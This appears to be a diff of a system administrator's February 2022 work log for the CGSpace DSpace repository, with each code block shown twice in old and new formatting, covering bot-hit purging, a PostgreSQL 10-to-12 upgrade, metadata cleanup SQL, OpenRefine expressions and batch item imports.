192 Opera Software AS
202 FACEBOOK
235 MTN NIGERIA Communication limited
260 GOOGLE
466 AMAZON-AES
607 Ethiopian Telecommunication Corporation
768 APPLE-ENGINEERING
1214 MICROSOFT-CORP-MSN-AS-BLOCK
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c org /tmp/feb9-ips.csv | sort | uniq -c | sort -h | tail -n <span style="color:#ae81ff">20</span>
</span></span><span style="display:flex;"><span> 92 Orange
</span></span><span style="display:flex;"><span> 100 Hetzner Online GmbH
</span></span><span style="display:flex;"><span> 100 Philippine Long Distance Telephone Company
</span></span><span style="display:flex;"><span> 107 AUTOMATTIC
</span></span><span style="display:flex;"><span> 110 ALFA TELECOM s.r.o.
</span></span><span style="display:flex;"><span> 111 AMAZON-02
</span></span><span style="display:flex;"><span> 118 Viettel Group
</span></span><span style="display:flex;"><span> 120 CHINA UNICOM China169 Backbone
</span></span><span style="display:flex;"><span> 123 Reliance Jio Infocomm Limited
</span></span><span style="display:flex;"><span> 123 Serverel Inc.
</span></span><span style="display:flex;"><span> 147 VNPT Corp
</span></span><span style="display:flex;"><span> 173 SAFARICOM-LIMITED
</span></span><span style="display:flex;"><span> 192 Opera Software AS
</span></span><span style="display:flex;"><span> 202 FACEBOOK
</span></span><span style="display:flex;"><span> 235 MTN NIGERIA Communication limited
</span></span><span style="display:flex;"><span> 260 GOOGLE
</span></span><span style="display:flex;"><span> 466 AMAZON-AES
</span></span><span style="display:flex;"><span> 607 Ethiopian Telecommunication Corporation
</span></span><span style="display:flex;"><span> 768 APPLE-ENGINEERING
</span></span><span style="display:flex;"><span> 1214 MICROSOFT-CORP-MSN-AS-BLOCK
</span></span></code></pre></div><ul>
<li>Most of these are pretty normal except &ldquo;Serverel&rdquo; and Hetzner perhaps, but their user agents are pretending to be normal users so who knows&hellip;</li>
<li>I decided to look in the Solr stats with <code>facet.limit=1000&amp;facet.mincount=1</code> (the full query shape is sketched after the purge output below) and found a few more definitely non-human agents:
<ul>
@ -439,25 +439,25 @@ $ csvjoin -c id /tmp/2022-02-07-tac-batch2-201-400.csv /tmp/batch2-filenames.csv
</li>
<li>I added them to the ILRI override in the DSpace spider list and ran the <code>check-spider-hits.sh</code> script:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
Purging 234 hits from randint in statistics
Purging 337 hits from Koha in statistics
Purging 1164 hits from scalaj-http in statistics
Purging 1528 hits from scpitspi-rs in statistics
Purging 3050 hits from lua-resty-http in statistics
Purging 1683 hits from AHC in statistics
Purging 1129 hits from acebookexternalhit in statistics
Purging 534 hits from Iframely in statistics
Purging 1022 hits from qbhttp in statistics
Purging 330 hits from ^got in statistics
Purging 156 hits from ^colly in statistics
Purging 38 hits from article-parser in statistics
Purging 1148 hits from SomeRandomText in statistics
Purging 3126 hits from adreview in statistics
Purging 217 hits from 1science in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 14696
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
</span></span><span style="display:flex;"><span>Purging 234 hits from randint in statistics
</span></span><span style="display:flex;"><span>Purging 337 hits from Koha in statistics
</span></span><span style="display:flex;"><span>Purging 1164 hits from scalaj-http in statistics
</span></span><span style="display:flex;"><span>Purging 1528 hits from scpitspi-rs in statistics
</span></span><span style="display:flex;"><span>Purging 3050 hits from lua-resty-http in statistics
</span></span><span style="display:flex;"><span>Purging 1683 hits from AHC in statistics
</span></span><span style="display:flex;"><span>Purging 1129 hits from acebookexternalhit in statistics
</span></span><span style="display:flex;"><span>Purging 534 hits from Iframely in statistics
</span></span><span style="display:flex;"><span>Purging 1022 hits from qbhttp in statistics
</span></span><span style="display:flex;"><span>Purging 330 hits from ^got in statistics
</span></span><span style="display:flex;"><span>Purging 156 hits from ^colly in statistics
</span></span><span style="display:flex;"><span>Purging 38 hits from article-parser in statistics
</span></span><span style="display:flex;"><span>Purging 1148 hits from SomeRandomText in statistics
</span></span><span style="display:flex;"><span>Purging 3126 hits from adreview in statistics
</span></span><span style="display:flex;"><span>Purging 217 hits from 1science in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 14696
</span></span></code></pre></div>
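<ul>
<li>For reference, the facet query behind that check looks roughly like this (a sketch assuming the legacy statistics core on localhost:8081):</li>
</ul>
<pre tabindex="0"><code>$ curl -s &#39;http://localhost:8081/solr/statistics/select?q=*:*&amp;rows=0&amp;wt=json&amp;facet=true&amp;facet.field=userAgent&amp;facet.limit=1000&amp;facet.mincount=1&#39;
</code></pre><ul>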
<li>I don&rsquo;t have time right now to add any of these to the COUNTER-Robots list&hellip;</li>
<li>Peter asked me to add a new item type on CGSpace: Opinion Piece (sketched below against the stock input forms)</li>
<li>Map an item on CGSpace for Maria since she couldn&rsquo;t find it in the item mapper</li>
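</ul>
<ul>
<li>The new type is a value-pairs entry in DSpace 6&rsquo;s <code>input-forms.xml</code>, roughly like this (assuming the stock <code>common_types</code> list):</li>
</ul>
<pre tabindex="0"><code>&lt;value-pairs value-pairs-name=&#34;common_types&#34; dc-term=&#34;type&#34;&gt;
  ...
  &lt;pair&gt;
    &lt;displayed-value&gt;Opinion Piece&lt;/displayed-value&gt;
    &lt;stored-value&gt;Opinion Piece&lt;/stored-value&gt;
  &lt;/pair&gt;
&lt;/value-pairs&gt;
</code></pre>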
@ -476,22 +476,22 @@ Purging 217 hits from 1science in statistics
<ul>
<li>Install PostgreSQL 12 on my local dev environment to start DSpace 6.x workflows with it:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD<span style="color:#f92672">=</span>postgres -p 5432:5432 -d postgres:12-alpine
$ createuser -h localhost -p <span style="color:#ae81ff">5432</span> -U postgres --pwprompt dspacetest
$ createdb -h localhost -p <span style="color:#ae81ff">5432</span> -U postgres -O dspacetest --encoding<span style="color:#f92672">=</span>UNICODE dspacetest
$ psql -h localhost -U postgres -c <span style="color:#e6db74">&#39;ALTER USER dspacetest SUPERUSER;&#39;</span>
$ pg_restore -h localhost -U postgres -d dspacetest -O --role<span style="color:#f92672">=</span>dspacetest -h localhost ~/Downloads/dspace-2022-02-12.backup
$ psql -h localhost -U postgres -c <span style="color:#e6db74">&#39;ALTER USER dspacetest NOSUPERUSER;&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD<span style="color:#f92672">=</span>postgres -p 5432:5432 -d postgres:12-alpine
</span></span><span style="display:flex;"><span>$ createuser -h localhost -p <span style="color:#ae81ff">5432</span> -U postgres --pwprompt dspacetest
</span></span><span style="display:flex;"><span>$ createdb -h localhost -p <span style="color:#ae81ff">5432</span> -U postgres -O dspacetest --encoding<span style="color:#f92672">=</span>UNICODE dspacetest
</span></span><span style="display:flex;"><span>$ psql -h localhost -U postgres -c <span style="color:#e6db74">&#39;ALTER USER dspacetest SUPERUSER;&#39;</span>
</span></span><span style="display:flex;"><span>$ pg_restore -h localhost -U postgres -d dspacetest -O --role<span style="color:#f92672">=</span>dspacetest -h localhost ~/Downloads/dspace-2022-02-12.backup
</span></span><span style="display:flex;"><span>$ psql -h localhost -U postgres -c <span style="color:#e6db74">&#39;ALTER USER dspacetest NOSUPERUSER;&#39;</span>
</span></span></code></pre></div><ul>
<li>Eventually I will update DSpace Test, then CGSpace (time to start paying off some technical debt!)</li>
<li>Start a full Discovery re-index on CGSpace:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>real 292m49.263s
user 201m26.097s
sys 3m2.459s
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>real 292m49.263s
</span></span><span style="display:flex;"><span>user 201m26.097s
</span></span><span style="display:flex;"><span>sys 3m2.459s
</span></span></code></pre></div><ul>
<li>Start a full harvest on AReS</li>
</ul>
<h2 id="2022-02-14">2022-02-14</h2>
@ -503,17 +503,17 @@ sys 3m2.459s
</li>
</ul>
<pre tabindex="0"><code>or(
isNotNull(value.match('201')),
isNotNull(value.match('203')),
isNotNull(value.match('209')),
isNotNull(value.match('209')),
isNotNull(value.match('215')),
isNotNull(value.match('220')),
isNotNull(value.match('225')),
isNotNull(value.match('226')),
isNotNull(value.match('227')),
isNotNull(value.match(&#39;201&#39;)),
isNotNull(value.match(&#39;203&#39;)),
isNotNull(value.match(&#39;209&#39;)),
isNotNull(value.match(&#39;209&#39;)),
isNotNull(value.match(&#39;215&#39;)),
isNotNull(value.match(&#39;220&#39;)),
isNotNull(value.match(&#39;225&#39;)),
isNotNull(value.match(&#39;226&#39;)),
isNotNull(value.match(&#39;227&#39;)),
...
isNotNull(value.match('396'))
isNotNull(value.match(&#39;396&#39;))
</code></pre><ul>
<li>Then I flagged all matching records and exported a CSV to use with SAFBuilder
<ul>
@ -521,15 +521,15 @@ isNotNull(value.match('396'))
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace import --add --eperson<span style="color:#f92672">=</span>fuuu@umm.com --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2022-02-14-tac-batch2-201to400.map
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace import --add --eperson<span style="color:#f92672">=</span>fuuu@umm.com --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2022-02-14-tac-batch2-201to400.map
</span></span></code></pre></div><ul>
<li>Export the next batch from OpenRefine (items with ID 401 to 700), check duplicates, and then join with the file names:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch3-401to700.csv &gt; /tmp/tac3.csv
$ ./ilri/check-duplicates.py -i /tmp/tac3.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-02-14-tac-batch3-401-700.csv
$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch3-401to700.csv &gt; /tmp/tac3-filenames.csv
$ csvjoin -c id /tmp/2022-02-14-tac-batch3-401-700.csv /tmp/tac3-filenames.csv &gt; /tmp/2022-02-14-tac-batch3-401-700-filenames.csv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch3-401to700.csv &gt; /tmp/tac3.csv
</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/tac3.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-02-14-tac-batch3-401-700.csv
</span></span><span style="display:flex;"><span>$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch3-401to700.csv &gt; /tmp/tac3-filenames.csv
</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/2022-02-14-tac-batch3-401-700.csv /tmp/tac3-filenames.csv &gt; /tmp/2022-02-14-tac-batch3-401-700-filenames.csv
</span></span></code></pre></div><ul>
<li>I sent these 300 items to Gaia&hellip;</li>
</ul>
<h2 id="2022-02-16">2022-02-16</h2>
@ -541,36 +541,36 @@ $ csvjoin -c id /tmp/2022-02-14-tac-batch3-401-700.csv /tmp/tac3-filenames.csv &
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># systemctl stop tomcat7
# pg_ctlcluster <span style="color:#ae81ff">10</span> main stop
# tar -cvzpf var-lib-postgresql-10.tar.gz /var/lib/postgresql/10
# tar -cvzpf etc-postgresql-10.tar.gz /etc/postgresql/10
# pg_ctlcluster <span style="color:#ae81ff">12</span> main stop
# pg_dropcluster <span style="color:#ae81ff">12</span> main
# pg_upgradecluster <span style="color:#ae81ff">10</span> main
# pg_ctlcluster <span style="color:#ae81ff">12</span> main start
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># systemctl stop tomcat7
</span></span><span style="display:flex;"><span># pg_ctlcluster <span style="color:#ae81ff">10</span> main stop
</span></span><span style="display:flex;"><span># tar -cvzpf var-lib-postgresql-10.tar.gz /var/lib/postgresql/10
</span></span><span style="display:flex;"><span># tar -cvzpf etc-postgresql-10.tar.gz /etc/postgresql/10
</span></span><span style="display:flex;"><span># pg_ctlcluster <span style="color:#ae81ff">12</span> main stop
</span></span><span style="display:flex;"><span># pg_dropcluster <span style="color:#ae81ff">12</span> main
</span></span><span style="display:flex;"><span># pg_upgradecluster <span style="color:#ae81ff">10</span> main
</span></span><span style="display:flex;"><span># pg_ctlcluster <span style="color:#ae81ff">12</span> main start
</span></span></code></pre></div><ul>
<li>After that I <a href="https://adamj.eu/tech/2021/04/13/reindexing-all-tables-after-upgrading-to-postgresql-13/">re-indexed the database indexes using a query</a>:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ su - postgres
$ cat /tmp/generate-reindex.sql
SELECT &#39;REINDEX TABLE CONCURRENTLY &#39; || quote_ident(relname) || &#39; /*&#39; || pg_size_pretty(pg_total_relation_size(C.oid)) || &#39;*/;&#39;
FROM pg_class C
LEFT JOIN pg_namespace N ON (N.oid = C.relnamespace)
WHERE nspname = &#39;public&#39;
AND C.relkind = &#39;r&#39;
AND nspname !~ &#39;^pg_toast&#39;
ORDER BY pg_total_relation_size(C.oid) ASC;
$ psql dspace &lt; /tmp/generate-reindex.sql &gt; /tmp/reindex.sql
$ &lt;trim the extra stuff from /tmp/reindex.sql&gt;
$ psql dspace &lt; /tmp/reindex.sql
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ su - postgres
</span></span><span style="display:flex;"><span>$ cat /tmp/generate-reindex.sql
</span></span><span style="display:flex;"><span>SELECT &#39;REINDEX TABLE CONCURRENTLY &#39; || quote_ident(relname) || &#39; /*&#39; || pg_size_pretty(pg_total_relation_size(C.oid)) || &#39;*/;&#39;
</span></span><span style="display:flex;"><span>FROM pg_class C
</span></span><span style="display:flex;"><span>LEFT JOIN pg_namespace N ON (N.oid = C.relnamespace)
</span></span><span style="display:flex;"><span>WHERE nspname = &#39;public&#39;
</span></span><span style="display:flex;"><span> AND C.relkind = &#39;r&#39;
</span></span><span style="display:flex;"><span> AND nspname !~ &#39;^pg_toast&#39;
</span></span><span style="display:flex;"><span>ORDER BY pg_total_relation_size(C.oid) ASC;
</span></span><span style="display:flex;"><span>$ psql dspace &lt; /tmp/generate-reindex.sql &gt; /tmp/reindex.sql
</span></span><span style="display:flex;"><span>$ &lt;trim the extra stuff from /tmp/reindex.sql&gt;
</span></span><span style="display:flex;"><span>$ psql dspace &lt; /tmp/reindex.sql
</span></span></code></pre></div>
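<ul>
<li>A quick way to see the effect on disk, using standard PostgreSQL size functions:</li>
</ul>
<pre tabindex="0"><code>$ psql dspace -c &#34;SELECT pg_size_pretty(pg_indexes_size(&#39;metadatavalue&#39;));&#34;
</code></pre><ul>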
<li>I saw that the index on <code>metadatavalue</code> shrunk by about 200MB!</li>
<li>After testing a few things I dropped the old cluster:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># pg_dropcluster <span style="color:#ae81ff">10</span> main
# dpkg -l | grep postgresql-10 | awk <span style="color:#e6db74">&#39;{print $2}&#39;</span> | xargs dpkg -r
</code></pre></div><h2 id="2022-02-17">2022-02-17</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># pg_dropcluster <span style="color:#ae81ff">10</span> main
</span></span><span style="display:flex;"><span># dpkg -l | grep postgresql-10 | awk <span style="color:#e6db74">&#39;{print $2}&#39;</span> | xargs dpkg -r
</span></span></code></pre></div><h2 id="2022-02-17">2022-02-17</h2>
<ul>
<li>I updated my <code>migrate-fields.sh</code> script to use field names instead of IDs
<ul>
@ -582,25 +582,25 @@ $ psql dspace &lt; /tmp/reindex.sql
<ul>
<li>Normalize the <code>text_lang</code> attributes of metadata on CGSpace:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">dspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
text_lang | count
-----------+---------
en_US | 2838588
en | 1082
| 801
fr | 2
vn | 2
en_US. | 1
sp | 1
| 0
(8 rows)
dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN (&#39;en&#39;, &#39;en_US.&#39;, &#39;&#39;);
UPDATE 1884
dspace=# UPDATE metadatavalue SET text_lang=&#39;vi&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN (&#39;vn&#39;);
UPDATE 2
dspace=# UPDATE metadatavalue SET text_lang=&#39;es&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN (&#39;sp&#39;);
UPDATE 1
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
</span></span><span style="display:flex;"><span> text_lang | count
</span></span><span style="display:flex;"><span>-----------+---------
</span></span><span style="display:flex;"><span> en_US | 2838588
</span></span><span style="display:flex;"><span> en | 1082
</span></span><span style="display:flex;"><span> | 801
</span></span><span style="display:flex;"><span> fr | 2
</span></span><span style="display:flex;"><span> vn | 2
</span></span><span style="display:flex;"><span> en_US. | 1
</span></span><span style="display:flex;"><span> sp | 1
</span></span><span style="display:flex;"><span> | 0
</span></span><span style="display:flex;"><span>(8 rows)
</span></span><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN (&#39;en&#39;, &#39;en_US.&#39;, &#39;&#39;);
</span></span><span style="display:flex;"><span>UPDATE 1884
</span></span><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_lang=&#39;vi&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN (&#39;vn&#39;);
</span></span><span style="display:flex;"><span>UPDATE 2
</span></span><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_lang=&#39;es&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN (&#39;sp&#39;);
</span></span><span style="display:flex;"><span>UPDATE 1
</span></span></code></pre></div><ul>
<li>I then exported the entire repository and did some cleanup on DOIs
<ul>
<li>I found ~1,200 items with no <code>cg.identifier.doi</code>, but which had a DOI in their citation (a GREL sketch for extracting those is below)</li>
@ -623,8 +623,8 @@ UPDATE 1
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">abs(diff(toDate(cells[&#34;issued&#34;].value),toDate(cells[&#34;dcterms.issued[en_US]&#34;].value), &#34;days&#34;))
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>abs(diff(toDate(cells[&#34;issued&#34;].value),toDate(cells[&#34;dcterms.issued[en_US]&#34;].value), &#34;days&#34;))
</span></span></code></pre></div><ul>
<li>In <em>most</em> cases Crossref&rsquo;s dates are more correct than ours, though there are a few odd cases where I don&rsquo;t yet know what strategy to use</li>
<li>Start a full harvest on AReS</li>
</ul>
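<ul>
<li>A GREL sketch of the kind of expression that pulls a DOI out of a citation cell in OpenRefine (the regex is illustrative, not exhaustive):</li>
</ul>
<pre tabindex="0"><code>if(isNotNull(value.match(/.*?(10\.\d{4,9}\/\S+).*/)), value.match(/.*?(10\.\d{4,9}\/\S+).*/)[0], null)
</code></pre>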
@ -639,26 +639,26 @@ UPDATE 1
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">or(
value.contains(&#34;10.1017&#34;),
value.contains(&#34;10.1007&#34;),
value.contains(&#34;10.1016&#34;),
value.contains(&#34;10.1098&#34;),
value.contains(&#34;10.1111&#34;),
value.contains(&#34;10.1002&#34;),
value.contains(&#34;10.1046&#34;),
value.contains(&#34;10.2135&#34;),
value.contains(&#34;10.1006&#34;),
value.contains(&#34;10.1177&#34;),
value.contains(&#34;10.1079&#34;),
value.contains(&#34;10.2298&#34;),
value.contains(&#34;10.1186&#34;),
value.contains(&#34;10.3835&#34;),
value.contains(&#34;10.1128&#34;),
value.contains(&#34;10.3732&#34;),
value.contains(&#34;10.2134&#34;)
)
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>or(
</span></span><span style="display:flex;"><span>value.contains(&#34;10.1017&#34;),
</span></span><span style="display:flex;"><span>value.contains(&#34;10.1007&#34;),
</span></span><span style="display:flex;"><span>value.contains(&#34;10.1016&#34;),
</span></span><span style="display:flex;"><span>value.contains(&#34;10.1098&#34;),
</span></span><span style="display:flex;"><span>value.contains(&#34;10.1111&#34;),
</span></span><span style="display:flex;"><span>value.contains(&#34;10.1002&#34;),
</span></span><span style="display:flex;"><span>value.contains(&#34;10.1046&#34;),
</span></span><span style="display:flex;"><span>value.contains(&#34;10.2135&#34;),
</span></span><span style="display:flex;"><span>value.contains(&#34;10.1006&#34;),
</span></span><span style="display:flex;"><span>value.contains(&#34;10.1177&#34;),
</span></span><span style="display:flex;"><span>value.contains(&#34;10.1079&#34;),
</span></span><span style="display:flex;"><span>value.contains(&#34;10.2298&#34;),
</span></span><span style="display:flex;"><span>value.contains(&#34;10.1186&#34;),
</span></span><span style="display:flex;"><span>value.contains(&#34;10.3835&#34;),
</span></span><span style="display:flex;"><span>value.contains(&#34;10.1128&#34;),
</span></span><span style="display:flex;"><span>value.contains(&#34;10.3732&#34;),
</span></span><span style="display:flex;"><span>value.contains(&#34;10.2134&#34;)
</span></span><span style="display:flex;"><span>)
</span></span></code></pre></div><ul>
<li>Many, many of Crossref&rsquo;s records are correct where we have no license, and in some cases more correct when we have a different license
<ul>
<li>I ran license updates on ~167 DOIs in the end on CGSpace (the import route is sketched below)</li>
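</ul>
<ul>
<li>One way such bulk updates land on CGSpace is DSpace&rsquo;s CSV metadata import (a sketch with a hypothetical file name):</li>
</ul>
<pre tabindex="0"><code>$ dspace metadata-import -f /tmp/2022-02-21-license-updates.csv
</code></pre>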
@ -669,11 +669,11 @@ value.contains(&#34;10.2134&#34;)
<ul>
<li>Update some audience metadata on CGSpace:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">dspace=# UPDATE metadatavalue SET text_value=&#39;Academics&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value = &#39;Academicians&#39;;
UPDATE 354
dspace=# UPDATE metadatavalue SET text_value=&#39;Scientists&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value = &#39;SCIENTISTS&#39;;
UPDATE 2
</code></pre></div><h2 id="2022-02-25">2022-02-25</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_value=&#39;Academics&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value = &#39;Academicians&#39;;
</span></span><span style="display:flex;"><span>UPDATE 354
</span></span><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_value=&#39;Scientists&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value = &#39;SCIENTISTS&#39;;
</span></span><span style="display:flex;"><span>UPDATE 2
</span></span></code></pre></div><h2 id="2022-02-25">2022-02-25</h2>
<ul>
<li>A few days ago Gaia sent me her notes on the third batch of TAC/ICW documents (items 401&ndash;700 in the spreadsheet)
<ul>
@ -682,23 +682,23 @@ UPDATE 2
</li>
</ul>
<pre tabindex="0"><code>or(
isNotNull(value.match('405')),
isNotNull(value.match('410')),
isNotNull(value.match('412')),
isNotNull(value.match('414')),
isNotNull(value.match('419')),
isNotNull(value.match('436')),
isNotNull(value.match('448')),
isNotNull(value.match('449')),
isNotNull(value.match('450')),
isNotNull(value.match(&#39;405&#39;)),
isNotNull(value.match(&#39;410&#39;)),
isNotNull(value.match(&#39;412&#39;)),
isNotNull(value.match(&#39;414&#39;)),
isNotNull(value.match(&#39;419&#39;)),
isNotNull(value.match(&#39;436&#39;)),
isNotNull(value.match(&#39;448&#39;)),
isNotNull(value.match(&#39;449&#39;)),
isNotNull(value.match(&#39;450&#39;)),
...
isNotNull(value.match('699'))
isNotNull(value.match(&#39;699&#39;))
)
</code></pre><ul>
<li>Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported them on DSpace Test:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace import --add --eperson<span style="color:#f92672">=</span>fuuu@umm.com --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2022-02-25-tac-batch3-401to700.map
</code></pre></div><h2 id="2022-02-26">2022-02-26</h2>
